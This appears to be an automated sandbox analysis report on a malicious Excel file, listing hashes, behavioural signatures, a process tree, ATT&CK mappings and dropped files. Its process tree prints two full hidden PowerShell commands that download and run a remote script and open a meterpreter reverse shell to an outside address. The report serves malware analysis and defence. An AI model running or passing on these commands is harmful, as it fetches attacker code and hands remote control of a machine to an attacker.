Analysis

  • max time kernel
    45s
  • max time network
    26s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    04-07-2024 22:22

General

  • Target

    6da0aff212ee22098d43d27ef6af27a3b60f63efa520e5ddbb71a4902fcd8673.xls

  • Size

    44KB

  • MD5

    27c3495d139babd4e95c88c3bd092d6a

  • SHA1

    c77f5ac04a38556b8c07e2a6eeffc589061c77dc

  • SHA256

    6da0aff212ee22098d43d27ef6af27a3b60f63efa520e5ddbb71a4902fcd8673

  • SHA512

    554ce51c18068737b589259b60e6be3142aeaa0f2d4b7f323d769314f61f4749f022d086b14bf63c4a913a9f89d105be6237034941f223f1190bc47805dbc535

  • SSDEEP

    768:JtvoeyUk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJExWlsFHmQQccAJ9acGg9acyL:xTk3hbdlylKsgqopeJBWhZFGkE+cL2NM

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6da0aff212ee22098d43d27ef6af27a3b60f63efa520e5ddbb71a4902fcd8673.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\config.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2516
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    1⤵
    • Process spawned unexpected child process
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2832

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JR52JTDUHYDVWAEPK0IE.temp
    Filesize

    7KB

    MD5

    5726fc3378624d4939e32305fb13a2eb

    SHA1

    5bc1b425f827c6ee8a221d207bf5a39d3b47d31f

    SHA256

    dbb0e74047f28b3c8752bba59ec4b10661bb0e6757ddc555b8b05bcba295eb05

    SHA512

    a28072d74e512433cb72ba43543b51d7db3f78353ef57ad4f8cf58cebb027133faabf70c7324c1652c3b19918db4259e120bda7bad35bf2f759a965d90c90835

  • C:\Users\Public\config.vbs
    Filesize

    461B

    MD5

    ce52ab154163c511f0efa6a61e22ab64

    SHA1

    9f12cc215e15802eddcb02cb5370ef16b21fa3a6

    SHA256

    df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

    SHA512

    cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

  • memory/2180-7-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-49-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2180-19-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-18-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-17-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-11-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-10-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-9-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-5-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-3-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-4-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-8-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-2-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-37-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-32-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-27-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-6-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-48-0x00000000008A0000-0x00000000009A0000-memory.dmp
    Filesize

    1024KB

  • memory/2180-1-0x000000007220D000-0x0000000072218000-memory.dmp
    Filesize

    44KB

  • memory/2180-47-0x000000007220D000-0x0000000072218000-memory.dmp
    Filesize

    44KB

  • memory/2832-44-0x0000000002000000-0x0000000002008000-memory.dmp
    Filesize

    32KB

  • memory/2832-43-0x000000001B640000-0x000000001B922000-memory.dmp
    Filesize

    2.9MB